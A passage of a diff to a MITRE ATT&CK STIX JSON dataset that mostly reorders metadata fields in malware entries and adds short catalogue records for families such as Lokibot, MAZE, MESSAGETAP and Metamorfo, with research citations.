- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "ISMInjector"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Robert Falcone"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "ISMInjector"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
@@ -195176,13 +224041,13 @@
],
"modified": "2020-03-20T02:21:24.856Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"InnaputRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
@@ -195214,13 +224079,13 @@
],
"modified": "2020-03-30T02:19:18.750Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"InvisiMole"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8beac7c2-48d2-4cd9-9b15-6c452f38ac06",
@@ -195248,13 +224113,13 @@
],
"modified": "2020-03-20T22:45:06.494Z",
"created": "2017-05-31T21:32:16.360Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Ixeshe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--aaf3fa65-8b27-4e68-91de-2b7738fe4c82",
@@ -195286,10 +224151,10 @@
],
"modified": "2020-03-30T16:51:27.312Z",
"created": "2019-06-18T17:20:43.635Z",
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"JCry"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8ae43c46-57ef-47d5-a77a-eebb35628db2",
@@ -195375,7 +224240,9 @@
],
"modified": "2020-03-30T16:51:56.323Z",
"created": "2017-05-31T21:32:34.199Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"JHUHUGIT",
"Trojan.Sofacy",
@@ -195385,9 +224252,7 @@
"GAMEFISH",
"SofacyCarberp"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"id": "malware--de6cb631-52f6-4169-a73b-7965390b0c30",
@@ -195419,16 +224284,16 @@
],
"modified": "2020-03-20T02:18:03.707Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "JPIN"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "JPIN"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--234e7770-99b0-4f65-b983-d3230f76a60b",
@@ -195455,13 +224320,13 @@
],
"modified": "2020-03-19T18:00:00.645Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"Janicab"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322",
@@ -195493,13 +224358,13 @@
],
"modified": "2020-03-30T16:52:22.775Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KARAE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
@@ -195531,13 +224396,13 @@
],
"modified": "2020-03-30T16:53:14.872Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KEYMARBLE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7dbb67c7-270a-40ad-836e-c45f8948aa5a",
@@ -195569,18 +224434,18 @@
],
"modified": "2020-03-30T16:53:45.307Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KOMPROGO"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"name": "KONNI",
- "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -195601,29 +224466,34 @@
"description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
},
{
- "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.",
+ "source_name": "Unit 42 NOKKI Sept 2018",
"url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
- "source_name": "Unit 42 NOKKI Sept 2018"
+ "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018."
},
{
- "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.",
+ "source_name": "Unit 42 Nokki Oct 2018",
"url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
- "source_name": "Unit 42 Nokki Oct 2018"
+ "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-20T02:11:56.423Z",
+ "modified": "2020-04-28T18:32:51.846Z",
"created": "2019-01-31T00:36:39.771Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KONNI"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.3"
},
{
"id": "malware--26fed817-e7bf-41f9-829a-9075ffac45c2",
@@ -195651,13 +224521,13 @@
],
"modified": "2020-03-30T16:54:23.238Z",
"created": "2017-05-31T21:32:57.344Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Kasidet"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--536be338-e2ef-4a6b-afb6-8d5568b91eb2",
@@ -195689,14 +224559,14 @@
],
"modified": "2020-03-20T21:15:48.610Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Kazuar"
- ],
"x_mitre_platforms": [
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Kazuar"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--5dd649c0-bca4-488b-bd85-b180474ec62e",
@@ -195738,15 +224608,15 @@
],
"modified": "2020-03-27T20:55:47.638Z",
"created": "2019-06-14T16:45:33.729Z",
- "x_mitre_contributors": [
- "Bart Parys"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"KeyBoy"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Bart Parys"
]
},
{
@@ -195788,13 +224658,47 @@
],
"modified": "2020-03-30T16:55:01.985Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"Keydnap",
"OSX/Keydnap"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0437",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0437"
+ },
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Kivars",
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)",
+ "id": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-03T20:19:34.935Z",
+ "created": "2020-05-06T18:10:59.143Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Kivars"
+ ],
"x_mitre_platforms": [
- "macOS"
+ "Windows"
]
},
{
@@ -195828,13 +224732,13 @@
],
"modified": "2020-03-30T16:55:54.637Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Komplex"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
@@ -195866,16 +224770,16 @@
],
"modified": "2020-03-18T22:06:42.386Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Kwampirs"
+ "x_mitre_contributors": [
+ "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
- ]
+ "x_mitre_aliases": [
+ "Kwampirs"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
@@ -195903,13 +224807,13 @@
],
"modified": "2020-03-30T16:56:27.375Z",
"created": "2017-05-31T21:32:33.348Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"LOWBALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -195937,14 +224841,14 @@
],
"modified": "2020-03-30T02:59:20.670Z",
"created": "2019-06-28T13:09:26.710Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"LightNeuron"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
"id": "malware--e9e9bfe2-76f4-4870-a2a1-b7af89808613",
@@ -195981,13 +224885,13 @@
],
"modified": "2020-03-30T16:57:00.081Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Linfo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0efefea5-78da-4022-92bc-d726139e8883",
@@ -196019,13 +224923,13 @@
],
"modified": "2020-03-30T16:57:31.004Z",
"created": "2019-03-04T17:12:37.586Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Linux Rabbit"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -196057,15 +224961,15 @@
],
"modified": "2020-03-30T16:57:58.594Z",
"created": "2019-07-02T12:58:09.598Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Jean-Ian Boutin, ESET"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"LoJax"
],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Jean-Ian Boutin, ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -196099,13 +225003,87 @@
],
"modified": "2020-03-20T18:56:22.049Z",
"created": "2019-04-16T19:00:49.435Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"LockerGoga"
],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0447",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0447"
+ },
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ },
+ {
+ "source_name": "Morphisec Lokibot April 2020",
+ "url": "https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode",
+ "description": "Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Lokibot",
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)",
+ "id": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-18T22:00:40.499Z",
+ "created": "2020-05-14T17:31:33.707Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Lokibot"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0451",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0451"
+ },
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
+ "name": "LoudMiner",
+ "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T23:17:50.246Z",
+ "created": "2020-05-18T21:01:51.045Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "LoudMiner"
+ ],
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "malware--251fbae2-78f6-4de7-84f6-194c727a64ad",
@@ -196138,14 +225116,87 @@
],
"modified": "2020-03-31T12:39:16.608Z",
"created": "2017-05-31T21:32:14.527Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Lurid",
"Enfal"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) ransomware, previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [MAZE](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)",
+ "name": "MAZE",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0449",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0449"
+ },
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ },
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:40:07.349Z",
+ "created": "2020-05-18T16:17:59.464Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "MAZE"
+ ],
+ "x_mitre_version": "1.0"
+ },
+ {
+ "id": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "name": "MESSAGETAP",
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0443",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0443"
+ },
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:43:11.282Z",
+ "created": "2020-05-11T21:41:19.008Z",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_aliases": [
+ "MESSAGETAP"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501",
@@ -196177,13 +225228,13 @@
],
"modified": "2020-03-30T17:00:19.828Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MURKYTOP"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f72251cb-2be5-421f-a081-99c29a1209e7",
@@ -196215,13 +225266,13 @@
],
"modified": "2020-03-30T17:00:58.813Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"MacSpy"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--35cd1d01-1ede-44d2-b073-a264d727bc04",
@@ -196258,16 +225309,16 @@
],
"modified": "2020-03-30T02:29:55.300Z",
"created": "2019-09-13T13:17:25.718Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Machete"
+ "x_mitre_contributors": [
+ "Matias Nicolas Porolli, ESET"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Matias Nicolas Porolli, ESET"
- ]
+ "x_mitre_aliases": [
+ "Machete"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--1cc934e4-b01d-4543-a011-b988dfc1a458",
@@ -196304,10 +225355,85 @@
],
"modified": "2020-03-30T17:02:21.114Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Matroyshka"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0459",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0459"
+ },
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)",
+ "name": "MechaFlounder",
+ "id": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-28T16:19:14.488Z",
+ "created": "2020-05-27T19:05:29.386Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "MechaFlounder"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0455",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0455"
+ },
+ {
+ "source_name": "Metamorfo",
+ "description": "(Citation: Medium Metamorfo Apr 2020)"
+ },
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Metamorfo",
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly brazilian users.(Citation: Medium Metamorfo Apr 2020)",
+ "id": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-25T19:12:24.385Z",
+ "created": "2020-05-26T17:34:19.044Z",
+ "x_mitre_contributors": [
+ "Chen Erlich, @chen_erlich, enSilo"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Metamorfo"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -196347,13 +225473,13 @@
],
"modified": "2020-03-30T17:03:01.353Z",
"created": "2019-01-29T21:47:53.070Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Micropsia"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
@@ -196417,13 +225543,13 @@
],
"modified": "2020-03-30T17:04:51.952Z",
"created": "2017-05-31T21:32:36.919Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MiniDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
@@ -196455,13 +225581,13 @@
],
"modified": "2020-03-30T17:05:26.798Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MirageFox"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61",
@@ -196489,13 +225615,13 @@
],
"modified": "2020-03-20T18:16:03.001Z",
"created": "2017-05-31T21:32:55.565Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mis-Type"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
@@ -196523,13 +225649,13 @@
],
"modified": "2020-03-20T18:16:26.920Z",
"created": "2017-05-31T21:32:55.126Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Misdat"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
@@ -196566,13 +225692,13 @@
],
"modified": "2020-03-25T16:03:26.871Z",
"created": "2017-05-31T21:32:54.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mivast"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
@@ -196631,13 +225757,13 @@
],
"modified": "2020-03-30T19:57:17.490Z",
"created": "2017-05-31T21:33:27.016Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MoonWind"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -196687,17 +225813,17 @@
],
"modified": "2020-03-30T17:06:07.337Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Drew Church, Splunk"
],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"More_eggs",
"Terra Loader",
"SpicyOmelette"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Drew Church, Splunk"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -196730,13 +225856,13 @@
],
"modified": "2020-03-30T17:06:45.586Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mosquito"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d1183cb9-258e-4f2f-8415-50ac8252c49e",
@@ -196768,13 +225894,13 @@
],
"modified": "2020-03-30T17:07:15.145Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NDiskMonitor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
